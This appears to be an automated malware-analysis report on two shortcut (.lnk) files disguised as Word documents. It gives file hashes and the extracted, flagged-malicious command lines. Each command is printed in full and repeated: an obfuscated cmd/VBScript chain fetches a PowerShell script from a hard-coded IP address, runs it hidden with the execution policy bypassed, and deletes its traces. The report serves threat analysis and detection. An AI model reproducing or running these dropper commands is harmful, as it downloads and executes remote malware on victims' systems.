|
Hash | Hash Value |
|---|---|
| MD5 | 258aa2891f92620aa8540ab6ba13c9f4
|
| Sha1 | 2167099d63bf1d92b02241312f467a5acbf4f181
|
| Sha256 | a1dbae0dd3e1d72f649be1c8a999274a22127ed27165018af1d96b7d6eda9baa
|
| Sha384 | 0cc2832d5b2c014cdfe468d809b2e21ee2b4c469cc10e05811bbe55465d616e4b4e7c2643c164894b44215cfa334cd28
|
| Sha512 | 5e4ab4a29737fbe010b3bf6bf46d57ba90293f7e51df64a599b9162363ba56c4f95c5b320c71ae5a1c46b4051bd5b4f28988c8ac7a80bbdfe42c1a8a48829857
|
| SSDeep | 48:V7PtJeQqTellc51WUrfAx7PUuuGJIEuqTelA51WUSxB1Bg/E7o/j27H:V7lJe7ellcn7i7suuGJIYelAnCT7J7H
|
| TLSH | 0E42AF8036E86304F2B2BE3DDE3A5B404537BAD0EE35839C8A10DC1D1966611CD74F36
|
|
Name | Value |
|---|---|
| LNK: Command Execution | cmd.exe /v /c "set "x1=MSXM" && set "x2=L2.XML" && set "v=!x1!!x2!HTTP" && echo Set h=CreateObject("!v!"):h.open "GET","http://193.169.194.86/krr4g/angeldogsled.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("ADO" ^& "DB.Str" ^& "eam"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\i8d1u.ps1",2 > %TEMP%\xw.vbs && cscript //b %TEMP%\xw.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\i8d1u.ps1 && del %TEMP%\xw.vbs %TEMP%\i8d1u.ps1" |
| URLs in VB Code - #1 | http://193.169.194.86/krr4g/angeldogsled.ps1 |
| Deobfuscated PowerShell | Remove-Item "%TEMP%\xw.vbs" "%TEMP%\i8d1u.ps1 IconLocation: imageres.dll" |
| Deobfuscated PowerShell | Remove-Item "%TEMP%\xw.vbs" "%TEMP%\i8d1u.ps1" |
| LNK: Command Execution | cmd.exe /v /c "set "x1=MSXM" && set "x2=L2.XML" && set "v=!x1!!x2!HTTP" && echo Set h=CreateObject("!v!"):h.open "GET","http://193.169.194.86/krr4g/philanthropyephyra.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("ADO" ^& "DB.Str" ^& "eam"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\ALZrzi.ps1",2 > %TEMP%\vVy.vbs && cscript //b %TEMP%\vVy.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\ALZrzi.ps1 && del %TEMP%\vVy.vbs %TEMP%\ALZrzi.ps1" |
| URLs in VB Code - #1 | http://193.169.194.86/krr4g/philanthropyephyra.ps1 |
| Deobfuscated PowerShell | Remove-Item "%TEMP%\vVy.vbs" "%TEMP%\ALZrzi.ps1 IconLocation: imageres.dll" |
| Deobfuscated PowerShell | Remove-Item "%TEMP%\vVy.vbs" "%TEMP%\ALZrzi.ps1" |
|
Name | Value | Location |
|---|---|---|
| LNK: Command Execution | cmd.exe /v /c "set "x1=MSXM" && set "x2=L2.XML" && set "v=!x1!!x2!HTTP" && echo Set h=CreateObject("!v!"):h.open "GET","http://193.169.194.86/krr4g/angeldogsled.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("ADO" ^& "DB.Str" ^& "eam"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\i8d1u.ps1",2 > %TEMP%\xw.vbs && cscript //b %TEMP%\xw.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\i8d1u.ps1 && del %TEMP%\xw.vbs %TEMP%\i8d1u.ps1" Malicious |
258aa2891f92620aa8540ab6ba13c9f4 > SPYSOK_mayna.docx.lnk |
| URLs in VB Code - #1 | http://193.169.194.86/krr4g/angeldogsled.ps1 |
258aa2891f92620aa8540ab6ba13c9f4 > SPYSOK_mayna.docx.lnk > [Lnk Summary] |
| Deobfuscated PowerShell | Remove-Item "%TEMP%\xw.vbs" "%TEMP%\i8d1u.ps1 IconLocation: imageres.dll" Malicious |
258aa2891f92620aa8540ab6ba13c9f4 > SPYSOK_mayna.docx.lnk > [Lnk Summary] > [PowerShell Command] |
| Deobfuscated PowerShell | Remove-Item "%TEMP%\xw.vbs" "%TEMP%\i8d1u.ps1" Malicious |
258aa2891f92620aa8540ab6ba13c9f4 > SPYSOK_mayna.docx.lnk > LNK CommandLine > [PowerShell Command] |
| LNK: Command Execution | cmd.exe /v /c "set "x1=MSXM" && set "x2=L2.XML" && set "v=!x1!!x2!HTTP" && echo Set h=CreateObject("!v!"):h.open "GET","http://193.169.194.86/krr4g/philanthropyephyra.ps1",False:h.setRequestHeader "User-Agent","UA WindowsPowerShell":h.send:Set b=CreateObject("ADO" ^& "DB.Str" ^& "eam"):b.Type=1:b.Open:b.Write h.responseBody:b.SaveToFile "%TEMP%\ALZrzi.ps1",2 > %TEMP%\vVy.vbs && cscript //b %TEMP%\vVy.vbs && powershell -NoP -W Hidden -ExecutionPolicy Bypass -File %TEMP%\ALZrzi.ps1 && del %TEMP%\vVy.vbs %TEMP%\ALZrzi.ps1" Malicious |
258aa2891f92620aa8540ab6ba13c9f4 > NAKAZ_MO_perevirka_mayna.docx.lnk |
| URLs in VB Code - #1 | http://193.169.194.86/krr4g/philanthropyephyra.ps1 |
258aa2891f92620aa8540ab6ba13c9f4 > NAKAZ_MO_perevirka_mayna.docx.lnk > [Lnk Summary] |
| Deobfuscated PowerShell | Remove-Item "%TEMP%\vVy.vbs" "%TEMP%\ALZrzi.ps1 IconLocation: imageres.dll" Malicious |
258aa2891f92620aa8540ab6ba13c9f4 > NAKAZ_MO_perevirka_mayna.docx.lnk > [Lnk Summary] > [PowerShell Command] |
| Deobfuscated PowerShell | Remove-Item "%TEMP%\vVy.vbs" "%TEMP%\ALZrzi.ps1" Malicious |
258aa2891f92620aa8540ab6ba13c9f4 > NAKAZ_MO_perevirka_mayna.docx.lnk > LNK CommandLine > [PowerShell Command] |